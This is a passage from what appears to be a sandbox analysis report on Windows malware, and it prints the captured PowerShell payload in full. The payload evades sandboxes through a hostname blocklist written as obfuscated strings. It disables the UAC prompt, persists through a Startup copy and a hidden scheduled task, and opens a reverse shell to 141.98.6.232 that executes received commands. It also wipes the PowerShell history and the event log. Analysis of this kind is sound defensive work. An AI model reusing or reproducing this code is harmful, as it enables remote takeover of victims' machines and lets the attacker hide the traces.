'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'S'+'1'+'L'+'F'+'P'+'H'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'S'+'U'+'P'+'E'+'R'+'I'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'V'+'1'+'L'+'2'+'6'+'J'+'5') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'V'+'I'+'R'+'E'+'N'+'D'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'V'+'K'+'N'+'F'+'F'+'B'+'6') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'V'+'R'+'S'+'Q'+'L'+'A'+'G') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'V'+'W'+'J'+'U'+'7'+'M'+'F') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'V'+'Z'+'5'+'Z'+'S'+'Y'+'I') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'W'+'8'+'J'+'L'+'V'+'9'+'V') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'W'+'G'+'3'+'M'+'Y'+'J'+'S') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'W'+'I'+'8'+'C'+'L'+'E'+'T') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'X'+'O'+'Y'+'7'+'M'+'H'+'S') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Y'+'8'+'A'+'S'+'U'+'I'+'L') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Y'+'W'+'9'+'U'+'O'+'1'+'H') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Z'+'J'+'F'+'9'+'K'+'A'+'N') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Z'+'M'+'Y'+'E'+'H'+'D'+'A') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Z'+'N'+'C'+'A'+'E'+'A'+'M') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Z'+'O'+'J'+'J'+'8'+'K'+'L') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Z'+'V'+'9'+'G'+'V'+'Y'+'L') { exit } if ($HNAME2023 -eq 'D'+'O'+'M'+'I'+'C'+'-'+'D'+'E'+'S'+'K'+'T'+'O'+'P') { exit } if ($HNAME2023 -eq 'E'+'A'+'8'+'C'+'2'+'E'+'2'+'A'+'-'+'D'+'0'+'1'+'7'+'-'+'4') { exit } if ($HNAME2023 -eq 'E'+'S'+'P'+'N'+'H'+'O'+'O'+'L') { exit } if ($HNAME2023 -eq 'G'+'A'+'N'+'G'+'I'+'S'+'T'+'A'+'N') { exit } if ($HNAME2023 -eq 
'G'+'B'+'Q'+'H'+'U'+'R'+'C'+'C') { exit } if ($HNAME2023 -eq 'G'+'R'+'A'+'F'+'P'+'C') { exit } if ($HNAME2023 -eq 'G'+'R'+'X'+'N'+'N'+'I'+'I'+'E') { exit } if ($HNAME2023 -eq 'g'+'Y'+'y'+'Z'+'c'+'9'+'H'+'Z'+'C'+'Y'+'h'+'R'+'L'+'N'+'g') { exit } if ($HNAME2023 -eq 'J'+'B'+'Y'+'Q'+'T'+'Q'+'B'+'O') { exit } if ($HNAME2023 -eq 'J'+'E'+'R'+'R'+'Y'+'-'+'T'+'R'+'U'+'J'+'I'+'L'+'L'+'O') { exit } if ($HNAME2023 -eq 'J'+'O'+'H'+'N'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'J'+'U'+'D'+'E'+'S'+'-'+'D'+'O'+'J'+'O') { exit } if ($HNAME2023 -eq 'J'+'U'+'L'+'I'+'A'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'L'+'A'+'N'+'T'+'E'+'C'+'H'+'-'+'L'+'L'+'C') { exit } if ($HNAME2023 -eq 'L'+'I'+'S'+'A'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'L'+'O'+'U'+'I'+'S'+'E'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'L'+'U'+'C'+'A'+'S'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'M'+'I'+'K'+'E'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'N'+'E'+'T'+'T'+'Y'+'P'+'C') { exit } if ($HNAME2023 -eq 'O'+'R'+'E'+'L'+'E'+'E'+'P'+'C') { exit } if ($HNAME2023 -eq 'O'+'R'+'X'+'G'+'K'+'K'+'Z'+'C') { exit } if ($HNAME2023 -eq 'P'+'a'+'u'+'l'+' '+'J'+'o'+'n'+'e'+'s') { exit } if ($HNAME2023 -eq 'P'+'C'+'-'+'D'+'A'+'N'+'I'+'E'+'L'+'E') { exit } if ($HNAME2023 -eq 'P'+'R'+'O'+'P'+'E'+'R'+'T'+'Y'+'-'+'L'+'T'+'D') { exit } if ($HNAME2023 -eq 'Q'+'9'+'I'+'A'+'T'+'R'+'K'+'P'+'R'+'H') { exit } if ($HNAME2023 -eq 'Q'+'a'+'r'+'Z'+'h'+'r'+'d'+'B'+'p'+'j') { exit } if ($HNAME2023 -eq 'R'+'A'+'L'+'P'+'H'+'S'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'S'+'E'+'R'+'V'+'E'+'R'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'S'+'E'+'R'+'V'+'E'+'R'+'1') { exit } if ($HNAME2023 -eq 'S'+'t'+'e'+'v'+'e') { exit } if ($HNAME2023 -eq 'S'+'Y'+'K'+'G'+'U'+'I'+'D'+'E'+'-'+'W'+'S'+'1'+'7') { exit } if ($HNAME2023 -eq 'T'+'0'+'0'+'9'+'1'+'7') { exit } if ($HNAME2023 -eq 't'+'e'+'s'+'t'+'4'+'2') { exit } if ($HNAME2023 -eq 'T'+'I'+'Q'+'I'+'Y'+'L'+'A'+'9'+'T'+'W'+'5'+'M') { exit } if ($HNAME2023 -eq 'T'+'M'+'K'+'N'+'G'+'O'+'M'+'U') { exit } if ($HNAME2023 
-eq 'T'+'V'+'M'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'V'+'O'+'N'+'R'+'A'+'H'+'E'+'L') { exit } if ($HNAME2023 -eq 'W'+'I'+'L'+'E'+'Y'+'P'+'C') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'-'+'5'+'E'+'0'+'7'+'C'+'O'+'S'+'9'+'A'+'L'+'R') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'D'+'O'+'W'+'S'+'-'+'E'+'E'+'L'+'5'+'3'+'S'+'N') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'1'+'B'+'H'+'R'+'V'+'P'+'Q'+'U') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'2'+'2'+'U'+'R'+'J'+'I'+'B'+'V') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'3'+'F'+'F'+'2'+'I'+'9'+'S'+'N') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'5'+'J'+'7'+'5'+'D'+'T'+'H'+'H') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'6'+'T'+'U'+'I'+'H'+'N'+'7'+'R') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'8'+'M'+'A'+'E'+'I'+'8'+'E'+'4') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'9'+'I'+'O'+'7'+'5'+'S'+'V'+'G') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'A'+'M'+'7'+'6'+'H'+'P'+'K'+'2') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'B'+'0'+'3'+'L'+'9'+'C'+'E'+'O') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'B'+'M'+'S'+'M'+'D'+'8'+'M'+'E') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'B'+'U'+'A'+'O'+'K'+'G'+'G'+'1') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'K'+'7'+'V'+'I'+'K'+'4'+'F'+'C') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'Q'+'N'+'G'+'K'+'G'+'N'+'5'+'9') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'R'+'S'+'T'+'0'+'E'+'8'+'V'+'U') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'U'+'9'+'5'+'1'+'9'+'1'+'I'+'G') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'V'+'Q'+'H'+'8'+'6'+'L'+'5'+'D') { exit } if ($HNAME2023 -eq 'W'+'O'+'R'+'K') { exit } if ($HNAME2023 -eq 'X'+'C'+'6'+'4'+'Z'+'B') { exit } if ($HNAME2023 -eq 'X'+'G'+'N'+'S'+'V'+'O'+'D'+'U') { exit } if ($HNAME2023 -eq 'Z'+'E'+'L'+'J'+'A'+'V'+'A') { exit } if ($HNAME2023 -eq 
'3'+'C'+'E'+'C'+'E'+'F'+'C'+'8'+'3'+'8'+'0'+'6') { exit } if ($HNAME2023 -eq 'C'+'8'+'1'+'F'+'6'+'6'+'C'+'8'+'3'+'8'+'0'+'5') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'U'+'S'+'L'+'V'+'D'+'7'+'G') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'A'+'U'+'P'+'F'+'K'+'S'+'Y') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'R'+'P'+'4'+'F'+'I'+'B'+'L') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'6'+'U'+'J'+'B'+'D'+'2'+'J') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'L'+'T'+'M'+'C'+'K'+'L'+'A') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'F'+'L'+'T'+'W'+'Y'+'Y'+'U') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'W'+'A'+'2'+'B'+'Y'+'3'+'L') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'U'+'B'+'D'+'J'+'J'+'0'+'A') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'K'+'X'+'P'+'5'+'Y'+'F'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'D'+'A'+'U'+'8'+'G'+'J'+'2') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'F'+'C'+'R'+'B'+'3'+'F'+'M') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'V'+'Y'+'R'+'N'+'O'+'7'+'M') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'P'+'K'+'Q'+'N'+'D'+'S'+'R') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'S'+'C'+'N'+'D'+'J'+'W'+'E') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'R'+'S'+'N'+'L'+'F'+'Z'+'S') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'M'+'W'+'F'+'R'+'V'+'K'+'H') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Q'+'L'+'N'+'2'+'V'+'U'+'F') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'6'+'2'+'Y'+'P'+'F'+'I'+'Q') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'P'+'A'+'0'+'F'+'N'+'V'+'5') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'B'+'9'+'O'+'A'+'R'+'K'+'C') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'J'+'5'+'X'+'G'+'G'+'X'+'R') { 
exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'J'+'H'+'U'+'H'+'O'+'T'+'B') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'6'+'4'+'A'+'C'+'U'+'C'+'H') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'S'+'U'+'N'+'D'+'M'+'I'+'5') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'G'+'C'+'N'+'6'+'M'+'I'+'O') { exit } if ($HNAME2023 -eq 'F'+'E'+'R'+'R'+'E'+'I'+'R'+'A'+'-'+'W'+'1'+'0') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'M'+'J'+'C'+'6'+'5'+'0'+'0') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'W'+'S'+'7'+'P'+'P'+'R'+'2') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'X'+'W'+'Q'+'5'+'F'+'U'+'V') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'U'+'H'+'H'+'S'+'Y'+'4'+'R') { exit } if ($HNAME2023 -eq 'A'+'R'+'T'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq '2'+'2'+'H'+'2'+'-'+'S'+'a'+'n'+'d'+'y'+'-'+'1'+'0') { exit } if ($HNAME2023 -eq '2'+'2'+'H'+'2'+'-'+'S'+'a'+'n'+'d'+'y'+'-'+'1'+'3') { exit } if ($HNAME2023 -eq 'R'+'T'+'T'+'C'+'-'+'S'+'a'+'n'+'d'+'y'+'-'+'0'+'1') { exit } if ($HNAME2023 -eq 'A'+'N'+'N'+'A'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'H'+'E'+'A'+'F'+'X'+'H'+'S'+'8'+'9'+'7'+'3'+'9'+'8'+'0'+'7') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'-'+'F'+'A'+'Q'+'N'+'W'+'5'+'1'+'H'+'S'+'Q'+'0') { exit } Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0 $curDir = Get-Location Copy-Item -Path \"$curDir\Confidential.exe\" -Recurse -Destination \"$($env:APPDATA)\Microsoft\Windows\Start Menu\Programs\Startup\update.exe\" -Force $Action = New-ScheduledTaskAction -Execute \"powershell.exe\" -Argument \"-ExecutionPolicy Bypass -WindowStyle Hidden -Command Start-Process -FilePath '$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\update.exe'\";$Trigger = New-ScheduledTaskTrigger -AtLogon;Register-ScheduledTask -TaskName \"service_upd\" -Trigger $Trigger -Action 
$Action -RunLevel Highest -Force while ($true) { try { $tcpClient = [System.Net.Sockets.TcpClient]::new() $tcpClient.Connect(\"141.98.6.232\", 4434) $stream = $tcpClient.GetStream() $reader = [System.IO.StreamReader]::new($stream) $writer = [System.IO.StreamWriter]::new($stream) $writer.AutoFlush = $true while ($true) { $command = $reader.ReadLine() if ($command -eq \"exit\") { exit } $output = @(Invoke-Expression $command) $outputCount = $output.Length $writer.WriteLine($outputCount) foreach ($o in $output) { $writer.WriteLine($o) } } $tcpClient.Close() } catch { Start-Sleep -Seconds 30 } } } DEL \"$env:APPDATA\Microsoft\Windows\PowerShell\PSReadline\*\" -Force -Recurse Clear-EventLog -LogName \"Windows PowerShell\" } }else{ DEL \"$env:APPDATA\Microsoft\Windows\PowerShell\PSReadline\*\" -Force -Recurse exit } "3⤵
- UAC bypass
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2964
C:\Windows\system32\HOSTNAME.EXE"C:\Windows\system32\HOSTNAME.EXE"4⤵PID:4680
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1160
Network
MITRE ATT&CK Enterprise v6
Downloads